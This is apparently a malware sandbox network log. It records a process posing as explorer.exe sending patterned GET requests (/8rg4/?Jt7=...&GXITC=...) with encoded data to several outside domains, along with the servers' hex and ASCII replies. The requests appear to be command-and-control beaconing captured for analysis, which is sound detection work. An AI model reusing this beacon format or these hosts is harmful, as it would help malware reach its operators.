Jan 13, 2021 20:48:46.088377953 CET	5421	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Wed, 13 Jan 2021 19:48:46 GMT Location: https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH Server: nginx/1.16.1 Content-Length: 303 Connection: Close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 2f 66 6f 72 73 61 6c 65 2f 66 75 74 62 6f 6c 63 6c 75 62 62 61 72 63 65 6c 6f 6e 61 2e 73 6f 63 63 65 72 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 69 64 3d 64 61 73 6c 6e 63 26 61 6d 70 3b 47 58 49 54 43 3d 4f 43 55 70 61 38 71 71 6e 35 63 46 66 37 51 58 71 79 41 4c 4d 55 68 57 71 35 39 4a 62 6d 78 75 65 4d 55 75 6b 2b 34 2b 64 4c 49 47 37 54 43 59 36 78 62 77 50 4c 4f 50 72 61 37 48 61 51 73 51 74 70 66 57 26 61 6d 70 3b 4a 74 37 3d 58 50 79 34 6e 46 6a 48 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49741	135.181.31.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:48:51.270602942 CET	5422	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1 Host: www.ondesign03.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:48:51.336184025 CET	5423	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 13 Jan 2021 19:48:51 GMT Content-Type: text/html Content-Length: 1417 Connection: close Vary: Accept-Encoding Last-Modified: Wed, 05 Aug 2020 09:00:18 GMT ETag: "589-5ac1d99d73c92" Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 2f 22 3e 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 3c 2f 61 3e 3c 2f 70 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://ondesign03.net/">ondesign03.net</a></p>
Jan 13, 2021 20:48:51.336205006 CET	5423	IN	Data Raw: 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 49 74 20 73 65 65 6d 73 20 74 68 61 74 20 74 68 65 20 70 Data Ascii: <h1>404</h1> <h2>Page Not Found</h2> <div> It seems that the page you were trying to reach does not exist anymore, or maybe it has just moved. You can start again from the <a href="http://ondesign03.net/">home</a> o

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49742	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:48:56.452843904 CET	5424	OUT	GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1 Host: www.crafteest.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:48:56.592288017 CET	5425	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 19:48:56 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc83a1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49743	104.233.238.207	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:49:02.043426037 CET	5426	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1 Host: www.4037a.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:49:02.244457006 CET	5428	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 Date: Wed, 13 Jan 2021 19:24:32 GMT Connection: close Content-Length: 2885 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 20 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e b0 a5 d1 bd a1 ad c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da 2d b9 dc bc d2 c6 c5 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 ce a2 c8 ed d1 c5 ba da 22 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 41 44 39 44 37 7d 0d 0a 69 6d 67 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 0d 0a 61 20 2a 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0d 0a 75 6c 2c 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 0d 0a 74 61 62 6c 65 7b 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 66 69 78 65 64 3b 7d 0d 0a 74 61 62 6c 65 20 74 72 20 74 64 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 20 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 0d 0a 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 0d 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 2e 63 66 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 2e 22 3b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 7d 0d 0a 2e 63 66 7b 7a 6f 6f 6d 3a 20 31 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 0d 0a 0d 0a 2e 62 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 34 30 34 2f 30 31 2e 6a 70 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 74 6f 70 20 23 44 41 44 39 44 37 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 0d 0a 2e 63 6f 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 7d 0d 0a 2e 63 31 7b 68 65 69 67 68 74 3a 33 36 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0d 0a 2e 63 31 20 2e 69 6d 67 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 0d 0a 2e 63 31 20 2e 69 6d 67 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 35 70 78 7d 0d 0a 2e 63 6f 6e 74 20 68 32 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>-</title><link rel="stylesheet" type="text/css" /><style>{margin:0;padding:0}body{font-family:"";background:#DAD9D7}img{border:none}a {cursor:pointer}ul,li{list-style:none}table{table-layout:fixed;}table tr td{word-break:break-all; word-wrap:break-word;}a{text-decoration:none;outline:none}a:hover{text-decoration:underline}.cf:after{content: ".";display: block;height: 0;font-size: 0;clear:both;visibility: hidden;}.cf{zoom: 1;clear:both}.bg{width:100%;background:url("404/01.jpg") no-repeat center top #DAD9D7;position:absolute;top:0;left:0;height:600px;overflow:hidden}.cont{margin:0 auto;width:500px;line-height:20px;}.c1{height:360px;text-align:center}.c1 .img1{margin-top:180px}.c1 .img2{margin-top:165px}.cont h2{text-align:center;color:#555;font-size:18px;font-weight:nor
Jan 13, 2021 20:49:02.244515896 CET	5429	IN	Data Raw: 6d 61 6c 3b 68 65 69 67 68 74 3a 33 35 70 78 7d 0d 0a 2e 63 32 7b 68 65 69 67 68 74 3a 33 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0d 0a 2e 63 32 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d Data Ascii: mal;height:35px}.c2{height:35px;text-align:center}.c2 a{display:inline-block;margin:0 4px;font-size:14px;height:23px;color:#626262;padding-top:1px;text-decoration:none;text-align:left}.c2 a:hover{color:#626262;text-decoration:none;}.c2
Jan 13, 2021 20:49:02.444785118 CET	5429	IN	Data Raw: 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 09 09 3c 68 32 3e b0 a5 d1 bd a1 ad c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da 3c 2f 68 32 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f Data Ascii: /></div><h2></h2><div class="c2"><a href="http://www.666604.com" class="home"></a><a href="http://www.666604.com" class="sr"></a></div><div class="c3"><a href="http://www.666604.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49744	195.78.66.137	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:49:07.643075943 CET	5430	OUT	GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1 Host: www.puzelhome.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:49:09.570158958 CET	5432	IN	HTTP/1.1 404 Not Found Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-transform, no-cache, no-store, must-revalidate Content-Type: text/html; charset=UTF-8 Link: <http://www.puzzelhome.com/index.php/wp-json/>; rel="https://api.w.org/" Set-Cookie: yith_wcwl_session_de4d178820413a8064bad1166f83953b=%7B%22session_id%22%3A%22225d8092df40a93a702760e8bac560e5%22%2C%22session_expiration%22%3A1613159349%2C%22session_expiring%22%3A1613155749%2C%22cookie_hash%22%3A%22d22c1d94f9faae3438ad9486069ebcfe%22%7D; expires=Fri, 12-Feb-2021 19:49:09 GMT; Max-Age=2592000; path=/; HttpOnly X-LiteSpeed-Cache-Control: public,max-age=3600 X-LiteSpeed-Tag: 066_HTTP.404,066_404,066_URL.4dd4e4aa8eba5784d63701e34cfa2e8d,066_ X-Litespeed-Cache: miss Transfer-Encoding: chunked Date: Wed, 13 Jan 2021 19:49:08 GMT Server: LiteSpeed Vary: User-Agent Data Raw: 63 31 37 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 09 09 09 09 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 2b 20 27 20 79 65 73 2d 6a 73 20 6a 73 5f 61 63 74 69 76 65 20 6a 73 27 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 53 74 72 6f 6e 61 20 6e 69 65 20 7a 6f 73 74 61 c5 82 61 20 7a 6e 61 6c 65 7a 69 6f 6e 61 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 77 69 Data Ascii: c172<!doctype html><html lang="pl-PL"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /><script>document.documentElement.className = document.documentElement.className + ' yes-js js_active js'</script><title>Strona nie zostaa znaleziona</title><script>wi
Jan 13, 2021 20:49:09.570198059 CET	5433	IN	Data Raw: 6e 64 6f 77 2e 5f 77 63 61 20 3d 20 77 69 6e 64 6f 77 2e 5f 77 63 61 20 7c 7c 20 5b 5d 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 70 75 7a 7a Data Ascii: ndow._wca = window._wca \|\| [];</script><link rel='dns-prefetch' href='//www.puzzelhome.com' /><link rel='dns-prefetch' href='//stats.wp.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.o
Jan 13, 2021 20:49:09.570224047 CET	5435	IN	Data Raw: 2c 36 35 30 33 39 2c 38 32 30 33 2c 39 38 39 35 2c 36 35 30 33 39 5d 29 26 26 28 21 63 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 36 Data Ascii: ,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8
Jan 13, 2021 20:49:09.570242882 CET	5436	IN	Data Raw: 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d Data Ascii: dow._wpemojiSettings);</script><style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !imp
Jan 13, 2021 20:49:09.570260048 CET	5437	IN	Data Raw: 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 77 69 73 68 6c 69 73 74 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 63 73 73 3f 76 65 72 3d 34 2e 37 2e 30 27 20 Data Ascii: -content/plugins/yith-woocommerce-wishlist/assets/css/font-awesome.css?ver=4.7.0' type='text/css' media='all' /><link rel='stylesheet' id='yith-wcwl-main-css' href='http://www.puzzelhome.com/wp-content/plugins/yith-woocommerce-wishlist/asset
Jan 13, 2021 20:49:09.570275068 CET	5439	IN	Data Raw: 6c 75 67 69 6e 73 2f 77 6f 6f 2d 70 61 79 70 61 6c 2d 65 78 70 72 65 73 73 2d 63 68 65 63 6b 6f 75 74 2f 70 75 62 6c 69 63 2f 63 73 73 2f 77 6f 6f 2d 70 61 79 70 61 6c 2d 65 78 70 72 65 73 73 2d 63 68 65 63 6b 6f 75 74 2d 70 75 62 6c 69 63 2e 63 Data Ascii: lugins/woo-paypal-express-checkout/public/css/woo-paypal-express-checkout-public.css?ver=1.0.1' type='text/css' media='all' /><link rel='stylesheet' id='woocommerce-layout-css' href='http://www.puzzelhome.com/wp-content/plugins/woocommerce/a
Jan 13, 2021 20:49:09.570290089 CET	5440	IN	Data Raw: 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 6e 69 6d 61 74 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 Data Ascii: .3' type='text/css' media='all' /><link rel='stylesheet' id='animate-css' href='http://www.puzzelhome.com/wp-content/themes/shop-elite/assets/lib/animate/animate.min.css?ver=5.5.3' type='text/css' media='all' /><link rel='stylesheet' id='bo
